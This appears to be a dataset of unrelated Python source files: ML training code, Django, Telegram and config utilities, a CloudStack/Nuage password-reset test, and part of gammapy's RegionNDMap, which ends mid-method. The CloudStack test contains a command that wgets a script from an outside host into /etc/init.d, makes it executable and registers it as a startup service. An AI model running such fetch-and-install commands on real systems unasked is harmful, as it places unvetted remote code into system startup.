sk_pnts.requires_grad_()
nonmnfld_pnts.requires_grad_()
sk_pred = implicit_net(sk_pnts)
nonmnfld_pred = implicit_net(nonmnfld_pnts)
mnfld_grad = gradient(sk_pnts, sk_pred)
nonmnfld_grad = gradient(nonmnfld_pnts, nonmnfld_pred)
sk_pred = sk_pred.reshape(1, -1, 1)
nonmnfld_grad = nonmnfld_grad.reshape(1, -1, 2)
mnfld_grad = mnfld_grad.reshape(1, -1, 2)
sk_normals = sk_normals.reshape(1, -1, 2)
mnfld_loss = (sk_pred.abs()).mean(dim=-1).mean(dim=-1).mean()
# eikonal loss
grad_loss = ((nonmnfld_grad.norm(2, dim=-1) - 1) ** 2).mean(dim=-1).mean()
# normals loss
norm_sub = (mnfld_grad - sk_normals).norm(2, dim=-1)
norm_add = (mnfld_grad + sk_normals).norm(2, dim=-1)
values = torch.cat((norm_sub.unsqueeze(-1), norm_add.unsqueeze(-1)), dim=-1)
normals_loss = torch.min(values, dim=-1)[0]
normals_loss = normals_loss.mean(dim=-1).mean()
im_loss = mnfld_loss + 0.1 * grad_loss
im_loss = im_loss + 1.0 * normals_loss
optimizer.zero_grad()
im_loss.backward()
optimizer.step()
global_step += 1
if it%100 ==0:
print("IGR loss: "+str(im_loss.item()))
if prev_lost is not None:
if torch.abs(im_loss - prev_lost) < eps_lost:
break
prev_lost = im_loss
implicit_net.eval()
# pnts = sketches[model_idx][j]
pnts = None
curr_latent = latent_codes_init[j]
plot_surface_2d(decoder=implicit_net,
path=plot_fol,
epoch=str(j),
shapename=MODEL_ID+"_refined",
points=pnts,
latent=curr_latent,
resolution=512,mc_value=0.0,is_uniform_grid=True,verbose=False,save_html=False,save_ply=False,overwrite=True)
#############################
# # Edit 2
# if i == 1:
# print("Editing...")
# c -= np.array([0, 0.3, 0])
# extent = np.abs(extent) - 0.3
with torch.no_grad():
## This is for a single segment
#### Extrusion Parameters
ax = torch.from_numpy(ax).unsqueeze(0).to(xy_flat.device).float()
c = torch.from_numpy(c).unsqueeze(0).to(xy_flat.device).float()
# # ## Edit 1
# if i == 0:
# print("Editing...")
# scale *= 2
##### For transformation to sketch coordinate space
rotation_matrices = get_visualizer_rotation_matrix(ax, xy_flat.device)
#####
print("For extrusion "+str(j))
print("Extrusion axis")
print(ax)
print("Extrusion center")
print(c)
print("Extrusion scale")
print(scale)
print("Extrusion extent")
print(extent)
print()
curr_implicit_latent_code = latent_codes_init[j]
curr_implicit_latent_code = curr_implicit_latent_code.unsqueeze(0)
### Intermediate_volume
volume_intermdiate = torch.ones([resol[2], resol[1], resol[0]]).cuda() * -1.0
for z_ind, z_val in enumerate(z_lin):
xyz_coord = torch.cat([xy_flat, torch.ones(1, xy_flat.shape[1], 1).cuda() * z_val], 2)
### Check if inside the sketch
xyz_coord_projected = transform_to_sketch_plane(xyz_coord, rotation_matrices, c, scale)
### Compute for occupancy
### Slow
net_input = add_latent(xyz_coord_projected, curr_implicit_latent_code)
sk_pred = implicit_net(net_input)
occupancy_sdf = (sk_pred <= 0.0).to(torch.float).T
curr_occupancy = occupancy_sdf
curr_sdf1 = sk_pred.to(torch.float).T
##########
### Check if inside the extent
dist = get_distances_on_extrusion_axis(xyz_coord, ax, c)
### Make extent bigger if it is a cut for better visualization
if ops[j] == -1:
# eps = np.max((eps, np.max(np.abs(extent))*0.02))
eps = np.max(np.abs(extent))*0.5
occupancy_extent = (torch.abs(dist) <= np.max(np.abs(extent))+eps).to(torch.float)
curr_occupancy *= occupancy_extent
curr_sdf2 = (np.max(np.abs(extent)) - torch.abs(dist)).to(torch.float)
multiplier = torch.ones(curr_sdf1.shape).to(torch.float).to(curr_sdf1.device) * -1.0
mask = torch.where((occupancy_sdf==1)&(occupancy_extent==1))
multiplier[mask] = 1.0
curr_sdf = torch.min(torch.abs(torch.cat((curr_sdf1, curr_sdf2), dim=0)), dim=0)[0] * multiplier * scale
#####
## For SDF
curr_sdf = curr_sdf.reshape([resol[0], resol[1]])
## First operation
if i == 0:
volume[z_ind] = (curr_sdf * ops[j])
else:
if ops[j] == -1:
occupancy_sdf = (sk_pred <= 0.0001).to(torch.float).T ### Some threshold to make it smooth
else:
occupancy_sdf = (sk_pred <= 0.05).to(torch.float).T ### Some threshold to make it smooth
occupancy_sdf = occupancy_sdf.reshape([resol[0], resol[1]])
occupancy_extent = occupancy_extent.reshape([resol[0], resol[1]])
### Works but a bit hacky --> Current working version
mask = torch.where((occupancy_sdf==1)&(occupancy_extent==1))
volume[z_ind][mask] = (curr_sdf * ops[j])[mask]
### Output intermediate volume
volume_intermdiate[z_ind] = curr_sdf
### Save intermediate volume
volume_intermdiate = volume_intermdiate.to("cpu")
try:
convert_sdf_samples_to_ply(volume_intermdiate, [0.,0.,0.], (ranges[0][1]-ranges[0][0]) / resol[0], os.path.join(intermediate_fol, MODEL_ID+str(i)+".ply"), level=level)
except:
continue
found = True
volume = volume.to("cpu")
print("Constructed occupancy volume")
print(torch.min(volume))
print(torch.max(volume))
try:
convert_sdf_samples_to_ply(volume, [0.,0.,0.], (ranges[0][1]-ranges[0][0]) / resol[0], os.path.join(recons_fol, MODEL_ID+".ply"), level=level)
except:
pass
if -1 in ops:
### Remove holes and artifacts
mesh = trimesh.load_mesh(os.path.join(recons_fol, MODEL_ID+".ply"))
whole_volume = mesh.volume
components = mesh.split()
thresh = 0.1
components_to_take = []
for comp in components:
vol = comp.volume
if vol > whole_volume*thresh:
components_to_take.append(comp)
mesh = trimesh.util.concatenate(components_to_take)
mesh.export(os.path.join(recons_fol, MODEL_ID+".ply"))
print()
print('Total time: {}'.format(time.time() - start_time))
|
nilq/baby-python
|
python
|
# Generated by Django 3.0.4 on 2020-04-22 13:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tutors', '0007_auto_20200416_1433'),
]
operations = [
migrations.AddField(
model_name='postanad',
name='views',
field=models.IntegerField(default=0),
),
]
|
nilq/baby-python
|
python
|
import configparser
import os
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), '../config.ini'))
STEAM_ACCOUNT = config['steam']['account_name']
STEAM_PASSWORD = config['steam']['password']
driver_path = config['selenium']['driver_path'] if config['selenium']['driver_path'].strip() else '../chromedriver'
SELENIUM_PATH = os.path.join(os.path.dirname(__file__), driver_path)
|
nilq/baby-python
|
python
|
# Author: Guilherme Aldeia
# Contact: guilherme.aldeia@ufabc.edu.br
# Version: 1.0.0
# Last modified: 05-29-2021 by Guilherme Aldeia
r"""Interaction Transformation Evolutionary Algorithm for **regression**
This sub-module implements a specialization of the base classes ``BaseITEA``
and ``BaseITExpr`` to be used on regression tasks.
Ideally, the user should import and use only the ``ITEA_regressor``
implementation, while the ``ITExpr_regressor`` should be created by means of the
itea instead of manually by the user.
The ``ITExpr_regressor`` works just like any fitted scikit regressor,
but --- in order to avoid the creation of problematic expressions --- I
strongly discourage the direct instantiation of ``ITExpr_regressor``.
"""
from itea.regression._ITExpr_regressor import ITExpr_regressor
from itea.regression._ITEA_regressor import ITEA_regressor
__all__ = [
'ITEA_regressor'
]
|
nilq/baby-python
|
python
|
from Tkinter import *
from tkMessageBox import *
def komunikaty():
if askyesno('Podaj odpowiedz!', u'Czy wiesz co robisz?'):
showwarning('Tak', u'Jak widze wiesz co robisz.')
else:
showinfo('Nie', 'Nie przejmuj sie, nie ty jeden.')
Button(text=u'Koniec', command=komunikaty).pack(fill=X)
Button(text=u'Blad',
command=(lambda: showerror('Error', 'I to wielki'))).pack(fill=X)
mainloop()
|
nilq/baby-python
|
python
|
import json
from typing import TYPE_CHECKING
from django.urls import reverse
from telegram import Bot as TelegramBot, Update
from telegram.ext import Updater
from ..dispatcher.setup import setup_dispatcher
if TYPE_CHECKING:
from django.http import HttpRequest
from telegram.ext import Dispatcher
from ..models import Bot
__all__ = (
'set_webhook',
'get_dispatcher',
'process_webhook_event'
)
def set_webhook(
*,
bot: 'Bot',
request: 'HttpRequest',
force_https: bool = True
) -> bool:
updater = Updater(token=bot.token)
if request.scheme != 'https' and force_https:
request._get_scheme = lambda: 'https'
url = (
request.build_absolute_uri(
reverse(
'telegram-bot:webhook',
kwargs={'token': bot.token}
)
)
)
print('Webhook url:', url)
result = updater.bot.setWebhook(url)
print('Webhook result:', result)
return result
def get_dispatcher(token: str) -> 'Dispatcher':
dispatcher: 'Dispatcher' = setup_dispatcher(token=token)
return dispatcher
def process_webhook_event(
token: str,
request_body: bytes,
dispatcher: 'Dispatcher' = None
):
if not isinstance(request_body, dict):
request_body = json.loads(request_body)
bot = TelegramBot(token=token)
data = Update.de_json(request_body, bot)
if dispatcher is None:
dispatcher: 'Dispatcher' = get_dispatcher(token)
dispatcher.process_update(data)
return dispatcher
|
nilq/baby-python
|
python
|
import os
import xml.etree.ElementTree as ET
from shutil import copyfile
import paths
def get_all_laws():
counter=0
wrd = "".join(os.getcwd())
laws_dir=wrd+"\\akn"
for root,subFolder,files in os.walk(wrd):
for item in files:
if(item.endswith("main.xml")):
dst = wrd + paths.data_xml_law_file + str(counter)+".xml"
src=str(root)+"\\main.xml"
copyfile(src, dst)
counter += 1
get_all_laws()
|
nilq/baby-python
|
python
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Component tests for user data and password reset functionality with Nuage VSP SDN plugin
"""
# Import Local Modules
from nuageTestCase import nuageTestCase
from marvin.lib.base import (Account,
Template,
VirtualMachine,
Volume)
from marvin.lib.common import list_templates
from marvin.lib.utils import cleanup_resources
from marvin.cloudstackAPI import updateTemplate
# Import System Modules
from nose.plugins.attrib import attr
import base64
class TestNuagePasswordReset(nuageTestCase):
"""Test user data and password reset functionality with Nuage VSP SDN plugin
"""
@classmethod
def setUpClass(cls):
super(TestNuagePasswordReset, cls).setUpClass()
return
def setUp(self):
self.cleanup = []
self.apiclient = self.testClient.getApiClient()
self.account = Account.create(
self.apiclient,
self.test_data["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup.append(self.account)
self.remove_vm2 = False
return
# tearDown() - Cleans up the setup, removes the VMs
def tearDown(self):
self.debug("CLEANUP: TEARDOWN")
self.apiclient = self.testClient.getApiClient()
self.updateTemplate(self.defaultTemplateVal)
self.vm_1.delete(self.apiclient, expunge=True)
if self.remove_vm2:
self.vm_2.delete(self.apiclient, expunge=True)
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
self.debug("Warning: Exception during cleanup: %s" % e)
return
# create_template - Creates template with the given VM object
def create_template(self, vm):
self.debug("Creating template")
list_volume = Volume.list(self.apiclient,
virtualmachineid=vm.id,
type='ROOT',
listall=True)
if isinstance(list_volume, list):
self.volume = list_volume[0]
else:
raise Exception("Exception: Unable to find root volume for VM with ID - %s" % vm.id)
self.pw_enabled_template = Template.create(
self.apiclient,
self.test_data["template"],
self.volume.id,
account=self.account.name,
domainid=self.account.domainid
)
self.assertEqual(self.pw_enabled_template.passwordenabled, True, "template is not passwordenabled")
self.cleanup.append(self.pw_enabled_template)
self.debug("Created template")
# updateTemplate - Updates value of template's password enabled setting
def updateTemplate(self, value):
self.debug("Updating value of template's password enabled setting")
cmd = updateTemplate.updateTemplateCmd()
cmd.id = self.template.id
cmd.passwordenabled = value
self.apiclient.updateTemplate(cmd)
list_template_response = list_templates(self.apiclient,
templatefilter="all",
id=self.template.id
)
self.template = list_template_response[0]
self.debug("Updated template")
# VM object is passed as an argument and its interface id is returned
def get_vm_interface_id(self, vm):
self.debug("GET VM INTERFACE ID")
nic_ext_id = self.get_externalID(vm.nic[0].id)
vm_interface = self.vsd.get_vm_interface(externalID=nic_ext_id)
vm_interface_id = vm_interface["ID"]
return vm_interface_id
# VM object is passed as an argument and its userdata URL is returned
def get_userdata_url(self, vm):
self.debug("GET USER DATA URL")
nic = vm.nic[0]
gateway = str(nic.gateway)
self.debug("GATEWAY: " + gateway)
user_data_url = 'curl "http://' + gateway + ':80/latest/user-data"'
return user_data_url
# Creates and verifies the firewall rule
def create_and_verify_fw(self, vm, public_ip, network):
self.debug("Create and verify firewall rule")
self.create_StaticNatRule_For_VM(vm, public_ip, network)
# VSD verification
self.verify_vsp_floating_ip(network, vm, public_ip.ipaddress)
fw_rule = self.create_FirewallRule(public_ip, self.test_data["ingress_rule"])
self.verify_vsp_firewall_rule(fw_rule)
vm_interface_id = self.get_vm_interface_id(vm)
pd = self.vsd.get_vm_interface_policydecisions(id=vm_interface_id)
self.debug(pd)
egressAcls = pd['egressACLs'][0]['entries']
gotFirewallPolicy = False
for acl in egressAcls:
if acl['destinationPort'] == "22-22":
gotFirewallPolicy = True
break
if not gotFirewallPolicy:
raise ValueError('No firewall policy decision in vm interface')
def stop_vm(self, vm):
self.debug("Stoping VM")
vm.stop(self.apiclient)
list_vm_response = VirtualMachine.list(self.apiclient,
id=vm.id)
if isinstance(list_vm_response, list):
vm = list_vm_response[0]
if vm.state != 'Stopped':
raise Exception("Failed to stop VM (ID: %s) " %
self.vm.id)
else:
raise Exception("Invalid response from list_virtual_machines VM (ID: %s) " %
self.vm.id)
def install_cloud_set_guest_password_script(self, ssh_client):
self.debug("GET CLOUD-SET-GUEST-PASSWORD")
cmd = "cd /etc/init.d;wget http://people.apache.org/~tsp/cloud-set-guest-password"
result = self.execute_cmd(ssh_client, cmd)
self.debug("WGET CLOUD-SET-GUEST-PASSWORD: " + result)
if "200 OK" not in result:
self.fail("failed to get file cloud-set-guest-password")
cmds = ["chmod +x /etc/init.d/cloud-set-guest-password",
"chkconfig --add cloud-set-guest-password"
]
for c in cmds:
result = self.execute_cmd(ssh_client, c)
self.debug("get_set_password_file cmd " + c)
self.debug("get_set_password_file result " + result)
@attr(tags=["advanced", "nuagevsp"], required_hardware="true")
def test_nuage_UserDataPasswordReset(self):
"""Test user data and password reset functionality with Nuage VSP SDN plugin
"""
"""
Validate the following:
1) user data
2) reset vm password.
Steps:
1. Set password enabled to false in the template.
2. Create an Isolated network - Test Network (10.1.1.1/24).
3. Deploy VM1 in Test Network
4. Verify domain,zone subnet, vm.
5. create public IP, Create Static Nat rule firewall rule and verify
6. SSH to VM should be successful
7. verify userdata
8. check cloud-set-guest-password exist.
9. if cloud-set-guest-password exist.
9.1 change template password enabled to true
9.2 verify that template is password enbalded
9.3 SSH with new password should be successful
10. else cloud-set-guest-password does not exist.
10.1 get the cloud-set-guest-password file
10.2 stop vm
10.3 create a new template with password enabled. Verify that template is password enabled.
10.4 create vm 2 with new template in Test Network
10.5 Verify vm.
10.6 create public IP, Create Static Nat rule firewall rule and verify
10.7 SSH to VM 2 should be successful
11. Reset VM password (VM_1 if guest password file exist. else it is VM2)
12 Starting VM and SSH to VM to verify new password
"""
self.debug("TEST USER DATA & PASSWORD RESET ON VM")
self.defaultTemplateVal = self.template.passwordenabled
if self.template.passwordenabled:
self.updateTemplate(False)
self.debug("CREATE AN ISOLATED NETWORK")
net_off = self.create_NetworkOffering(self.test_data["nuagevsp"]["isolated_network_offering"])
self.network_1 = self.create_Network(net_off)
self.cleanup.append(self.network_1)
expUserData = "hello world vm1"
userdata = base64.b64encode(expUserData)
self.test_data["virtual_machine_userdata"]["userdata"] = userdata
self.debug("DEPLOY VM 1 IN TEST NETWORK")
# Pass the network and name of the vm type from the testdata with the configuration for the vm
self.vm_1 = self.create_VM(self.network_1, vm_key="virtual_machine_userdata")
self.vm_1.password = self.test_data["virtual_machine_userdata"]["password"]
user_data_cmd = self.get_userdata_url(self.vm_1)
# VSD verification
self.debug("VERIFY DOMAIN, ZONE, NETWORK , and VM 1")
self.verify_vsp_network(self.domain.id, self.network_1)
self.verify_vsp_vm(self.vm_1)
self.debug("CREATE PUBLIC IP, STATIC NAT RULE, FLOATING IP, FIREWALL AND VERIFY")
public_ip_1 = self.acquire_PublicIPAddress(self.network_1)
self.create_and_verify_fw(self.vm_1, public_ip_1, self.network_1)
self.debug("SSH TO VM")
ssh = self.ssh_into_VM(self.vm_1, public_ip_1)
self.debug("VERIFY USER DATA")
self.debug("Get User Data with command: " + user_data_cmd)
adata = self.execute_cmd(ssh, user_data_cmd)
actUserData = base64.b64decode(adata)
self.debug("Response User Data=" + actUserData + ", Expected=" + expUserData)
self.assertEqual(actUserData, expUserData, "User Data Did Not Match ")
# check /etc/init.d/cloud-set-quest-password
ls_cmd = "ls /etc/init.d/cloud-set-guest-password"
ls_result = self.execute_cmd(ssh, ls_cmd)
ls_result = ls_result.lower()
self.debug("reponse from ls_cmd: " + ls_result)
if "no such file" in ls_result:
self.debug("NO CLOUD-SET_GUEST_PASSWORD FILE. NEED TO GET ONE")
self.install_cloud_set_guest_password_script(ssh)
self.stop_vm(self.vm_1)
self.create_template(self.vm_1)
self.debug("DEPLOY VM 2 IN TEST NETWORK WITH NEW TEMPLATE")
self.vm_2 = self.create_VM(self.network_1, vm_key="virtual_machine_userdata")
self.remove_vm2 = True
self.debug("STARTING VM_2 ")
vm_2a = self.vm_2.start(self.apiclient)
self.vm_2.password = vm_2a.password.strip()
self.vm_2.nic = vm_2a.nic
self.debug("VM - %s password - %s !" % (self.vm_2.name, self.vm_2.password))
self.assertNotEqual(self.vm_2.password,
self.test_data["virtual_machine_userdata"]["password"],
"Password enabled not working. Password same as virtual_machine password "
)
self.verify_vsp_vm(vm_2a)
self.debug("GET PUBLIC IP. CREATE AND VERIFIED FIREWALL RULES")
public_ip_2 = self.acquire_PublicIPAddress(self.network_1)
self.create_and_verify_fw(self.vm_2, public_ip_2, self.network_1)
self.ssh_into_VM(self.vm_2, public_ip_2)
vm_test = self.vm_2
vm_test_public_ip = public_ip_2
else:
self.debug("UPDATE TEMPLATE TO PASSWORD ENABLED")
self.updateTemplate(True)
self.assertEqual(self.template.passwordenabled, True, "Template is not password enabled")
vm_test = self.vm_1
vm_test_public_ip = public_ip_1
self.debug("RESETTING VM PASSWORD for VM - %s" % vm_test.name)
vm_test.password = vm_test.resetPassword(self.apiclient)
self.debug("Password reset to - %s" % vm_test.password)
self.debug("STARTING VM AND SSH TO VM TO VERIFY NEW PASSWORD")
vm_test.start(self.apiclient)
self.debug("VM - %s started!" % vm_test.name)
self.ssh_into_VM(vm_test, vm_test_public_ip)
|
nilq/baby-python
|
python
|
from typing import Union, List, Tuple, Callable, Dict, Optional
import numpy as np
from medsearch.models.base import TorchModelBase
from medsearch.models.utils import cosine_similarity
from medsearch.datasets.dataset import SemanticCorpusDataset
from sentence_transformers import SentenceTransformer
class SentenceTransformerModel(TorchModelBase):
def __init__(self,
dataset_cls:type=SemanticCorpusDataset,
network_fn:Callable=SentenceTransformer,
dataset_args:Dict=None,
network_args:Dict=None):
super().__init__(dataset_cls,None, network_fn, dataset_args, network_args)
def word_embeddings(self, corpus:List[str]):
self.embedder = lambda txt: np.array(self.network.encode(txt))
self.corpus_embed = self.embedder(corpus)
def get_similarity_vecs(self, query:Union[str,List[str]], topk:int=10):
self.query_embed = self.embedder(query)
scores = cosine_similarity(self.query_embed, self.corpus_embed)[0]
results = zip(range(len(scores)), scores)
results = sorted(results, key=lambda x: x[1], reverse=True)
return results[:topk]
|
nilq/baby-python
|
python
|
from itertools import product
import numpy as np
from astropy import units as u
from astropy.io import fits
from astropy.table import Table
from astropy.visualization import quantity_support
from scipy.ndimage.measurements import label as ndi_label
from gammapy.extern.skimage import block_reduce
from gammapy.utils.interpolation import ScaledRegularGridInterpolator
from gammapy.utils.scripts import make_path
from .core import Map
from .geom import pix_tuple_to_idx
from .axes import MapAxes, MapAxis, TimeMapAxis
from .region import RegionGeom
from .utils import INVALID_INDEX
__all__ = ["RegionNDMap"]
class RegionNDMap(Map):
"""N-dimensional region map.
A `~RegionNDMap` owns a `~RegionGeom` instance as well as a data array
containing the values associated to that region in the sky along the non-spatial
axis, usually an energy axis. The spatial dimensions of a `~RegionNDMap`
are reduced to a single spatial bin with an arbitrary shape,
and any extra dimensions are described by an arbitrary number of non-spatial axes.
Parameters
----------
geom : `~gammapy.maps.RegionGeom`
Region geometry object.
data : `~numpy.ndarray`
Data array. If none then an empty array will be allocated.
dtype : str, optional
Data type, default is float32
meta : `dict`
Dictionary to store meta data.
unit : str or `~astropy.units.Unit`
The map unit
"""
def __init__(self, geom, data=None, dtype="float32", meta=None, unit=""):
if data is None:
data = np.zeros(geom.data_shape, dtype=dtype)
if meta is None:
meta = {}
self._geom = geom
self.data = data
self.meta = meta
self.unit = u.Unit(unit)
def plot(self, ax=None, axis_name=None, **kwargs):
"""Plot the data contained in region map along the non-spatial axis.
Parameters
----------
ax : `~matplotlib.pyplot.Axis`
Axis used for plotting
axis_name : str
Which axis to plot on the x axis. Extra axes will be plotted as
additional lines.
**kwargs : dict
Keyword arguments passed to `~matplotlib.pyplot.errorbar`
Returns
-------
ax : `~matplotlib.pyplot.Axis`
Axis used for plotting
"""
import matplotlib.pyplot as plt
from matplotlib.dates import DateFormatter
ax = ax or plt.gca()
if axis_name is None:
axis_name = 0
axis = self.geom.axes[axis_name]
kwargs.setdefault("marker", "+")
kwargs.setdefault("ls", "None")
kwargs.setdefault("xerr", axis.as_xerr)
if isinstance(axis, TimeMapAxis):
if axis.time_format == "iso":
center = axis.time_mid.datetime
else:
center = axis.time_mid.mjd * u.day
else:
center = axis.center
yerr_nd, yerr = kwargs.pop("yerr", None), None
uplims_nd, uplims = kwargs.pop("uplims", None), None
label_default = kwargs.pop("label", None)
labels = product(*[ax.as_labels for ax in self.geom.axes if ax.name != axis_name])
for label_axis, (idx, quantity) in zip(labels, self.iter_by_axis(axis_name=axis.name)):
if isinstance(yerr_nd, tuple):
yerr = yerr_nd[0][idx], yerr_nd[1][idx]
elif isinstance(yerr_nd, np.ndarray):
yerr = yerr_nd[idx]
if uplims_nd is not None:
uplims = uplims_nd[idx]
label = " ".join(label_axis) if label_default is None else label_default
with quantity_support():
ax.errorbar(
x=center,
y=quantity,
yerr=yerr,
uplims=uplims,
label=label,
**kwargs
)
if axis.interp == "log":
ax.set_xscale("log")
xlabel = axis.name.capitalize() + f" [{ax.xaxis.units}]"
if isinstance(axis, TimeMapAxis):
xlabel = axis.name.capitalize() + f" [{axis.time_format}]"
ax.set_xlabel(xlabel)
if not self.unit.is_unity():
ax.set_ylabel(f"Data [{self.unit}]")
if axis.interp == "log":
ax.set_yscale("log")
if isinstance(axis, TimeMapAxis) and axis.time_format == "iso":
ax.xaxis.set_major_formatter(DateFormatter("%Y-%m-%d %H:%M:%S"))
plt.setp(
ax.xaxis.get_majorticklabels(),
rotation=30,
ha="right",
rotation_mode="anchor",
)
if len(self.geom.axes) > 1:
plt.legend()
return ax
def plot_hist(self, ax=None, **kwargs):
"""Plot as histogram.
kwargs are forwarded to `~matplotlib.pyplot.hist`
Parameters
----------
ax : `~matplotlib.axis` (optional)
Axis instance to be used for the plot
**kwargs : dict
Keyword arguments passed to `~matplotlib.pyplot.hist`
Returns
-------
ax : `~matplotlib.pyplot.Axis`
Axis used for plotting
"""
import matplotlib.pyplot as plt
ax = plt.gca() if ax is None else ax
kwargs.setdefault("histtype", "step")
kwargs.setdefault("lw", 1)
axis = self.geom.axes[0]
with quantity_support():
weights = self.data[:, 0, 0]
ax.hist(axis.center.value, bins=axis.edges.value, weights=weights, **kwargs)
ax.set_xlabel(axis.name.capitalize() + f" [{axis.unit}]")
if not self.unit.is_unity():
ax.set_ylabel(f"Data [{self.unit}]")
ax.set_xscale("log")
ax.set_yscale("log")
return ax
def plot_interactive(self):
raise NotImplementedError(
"Interactive plotting currently not support for RegionNDMap"
)
def plot_region(self, ax=None, **kwargs):
"""Plot region
Parameters
----------
ax : `~astropy.vizualisation.WCSAxes`
Axes to plot on. If no axes are given,
the region is shown using the minimal
equivalent WCS geometry.
**kwargs : dict
Keyword arguments forwarded to `~regions.PixelRegion.as_artist`
"""
ax = self.geom.plot_region(ax, **kwargs)
return ax
def plot_mask(self, ax=None, **kwargs):
"""Plot the mask as a shaded area in a xmin-xmax range
Parameters
----------
ax : `~matplotlib.axis`
Axis instance to be used for the plot.
**kwargs : dict
Keyword arguments passed to `~matplotlib.pyplot.axvspan`
Returns
-------
ax : `~matplotlib.pyplot.Axis`
Axis used for plotting
"""
import matplotlib.pyplot as plt
if not self.is_mask:
raise ValueError("This is not a mask and cannot be plotted")
kwargs.setdefault("color", "k")
kwargs.setdefault("alpha", 0.05)
kwargs.setdefault("label", "mask")
ax = plt.gca() if ax is None else ax
edges = self.geom.axes["energy"].edges.reshape((-1, 1, 1))
labels, nlabels = ndi_label(self.data)
for idx in range(1, nlabels + 1):
mask = (labels == idx)
xmin = edges[:-1][mask].min().value
xmax = edges[1:][mask].max().value
ax.axvspan(xmin, xmax, **kwargs)
return ax
@classmethod
def create(cls, region, axes=None, dtype="float32", meta=None, unit="", wcs=None, binsz_wcs="0.1deg", data=None):
"""Create an empty region map object.
Parameters
----------
region : str or `~regions.SkyRegion`
Region specification
axes : list of `MapAxis`
Non spatial axes.
dtype : str
Data type, default is 'float32'
unit : str or `~astropy.units.Unit`
Data unit.
meta : `dict`
Dictionary to store meta data.
wcs : `~astropy.wcs.WCS`
WCS projection to use for local projections of the region
data : `~numpy.ndarray`
Data array
Returns
-------
map : `RegionNDMap`
Region map
"""
geom = RegionGeom.create(region=region, axes=axes, wcs=wcs, binsz_wcs=binsz_wcs)
return cls(geom=geom, dtype=dtype, unit=unit, meta=meta, data=data)
def downsample(
self, factor, preserve_counts=True, axis_name="energy", weights=None
):
"""Downsample the non-spatial dimension by a given factor.
Parameters
----------
factor : int
Downsampling factor.
preserve_counts : bool
Preserve the integral over each bin. This should be true
if the map is an integral quantity (e.g. counts) and false if
the map is a differential quantity (e.g. intensity).
axis_name : str
Which axis to downsample. Default is "energy".
weights : `RegionNDMap`
Contains the weights to apply to the axis to reduce. Default
is just weighs of one.
Returns
-------
map : `RegionNDMap`
Downsampled region map.
"""
if axis_name is None:
return self.copy()
geom = self.geom.downsample(factor=factor, axis_name=axis_name)
block_size = [1] * self.data.ndim
idx = self.geom.axes.index_data(axis_name)
block_size[idx] = factor
if weights is None:
weights = 1
else:
weights = weights.data
func = np.nansum if preserve_counts else np.nanmean
if self.is_mask:
func = np.all
data = block_reduce(self.data * weights, tuple(block_size), func=func)
return self._init_copy(geom=geom, data=data)
def upsample(self, factor, preserve_counts=True, axis_name="energy"):
"""Upsample the non-spatial dimension by a given factor.
Parameters
----------
factor : int
Upsampling factor.
preserve_counts : bool
Preserve the integral over each bin. This should be true
if the RegionNDMap is an integral quantity (e.g. counts) and false if
the RegionNDMap is a differential quantity (e.g. intensity).
axis_name : str
Which axis to upsample. Default is "energy".
Returns
-------
map : `RegionNDMap`
Upsampled region map.
"""
geom = self.geom.upsample(factor=factor, axis_name=axis_name)
data = self.interp_by_coord(geom.get_coord())
if preserve_counts:
data /= factor
return self._init_copy(geom=geom, data=data)
def iter_by_axis(self, axis_name):
"""Iterate data by axis
Parameters
----------
axis_name : str
Axis name
Returns
-------
idx, data : tuple, `~astropy.units.Quantity`
Data and index
"""
idx_axis = self.geom.axes.index_data(axis_name)
shape = list(self.data.shape)
shape[idx_axis] = 1
for idx in np.ndindex(*shape):
idx = list(idx)
idx[idx_axis] = slice(None)
yield tuple(idx), self.quantity[tuple(idx)]
def fill_by_idx(self, idx, weights=None):
idx = pix_tuple_to_idx(idx)
msk = np.all(np.stack([t != INVALID_INDEX.int for t in idx]), axis=0)
idx = [t[msk] for t in idx]
if weights is not None:
if isinstance(weights, u.Quantity):
weights = weights.to_value(self.unit)
weights = weights[msk]
idx = np.ravel_multi_index(idx, self.data.T.shape)
idx, idx_inv = np.unique(idx, return_inverse=True)
weights = np.bincount(idx_inv, weights=weights).astype(self.data.dtype)
self.data.T.flat[idx] += weights
def get_by_idx(self, idxs):
return self.data[idxs[::-1]]
def interp_by_coord(self, coords, method="linear", fill_value=None):
pix = self.geom.coord_to_pix(coords)
return self.interp_by_pix(pix, method=method, fill_value=fill_value)
def interp_by_pix(self, pix, method="linear", fill_value=None):
grid_pix = [np.arange(n, dtype=float) for n in self.data.shape[::-1]]
if np.any(np.isfinite(self.data)):
data = self.data.copy().T
data[~np.isfinite(data)] = 0.0
else:
data = self.data.T
fn = ScaledRegularGridInterpolator(
grid_pix, data, fill_value=fill_value, method=method
)
return fn(tuple(pix), clip=False)
def set_by_idx(self, idx, value):
self.data[idx[::-1]] = value
@classmethod
def read(cls, filename, format="gadf", ogip_column=None, hdu=None):
"""Read from file.
Parameters
----------
filename : `pathlib.Path` or str
Filename.
format : {"gadf", "ogip", "ogip-arf"}
Which format to use.
ogip_column : {None, "COUNTS", "QUALITY", "BACKSCAL"}
If format 'ogip' is chosen which table hdu column to read.
hdu : str
Name or index of the HDU with the map data.
Returns
-------
region_map : `RegionNDMap`
Region nd map
"""
filename = make_path(filename)
with fits.open(filename, memmap=False) as hdulist:
return cls.from_hdulist(hdulist, format=format, ogip_column=ogip_column, hdu=hdu)
def write(self, filename, overwrite=False, format="gadf", hdu="SKYMAP"):
"""Write map to file
Parameters
----------
filename : `pathlib.Path` or str
Filename.
format : {"gadf", "ogip", "ogip-sherpa", "ogip-arf", "ogip-arf-sherpa"}
Which format to use.
overwrite : bool
Overwrite existing files?
"""
filename = make_path(filename)
self.to_hdulist(format=format, hdu=hdu).writeto(
filename, overwrite=overwrite
)
def to_hdulist(self, format="gadf", hdu="SKYMAP", hdu_bands=None, hdu_region=None):
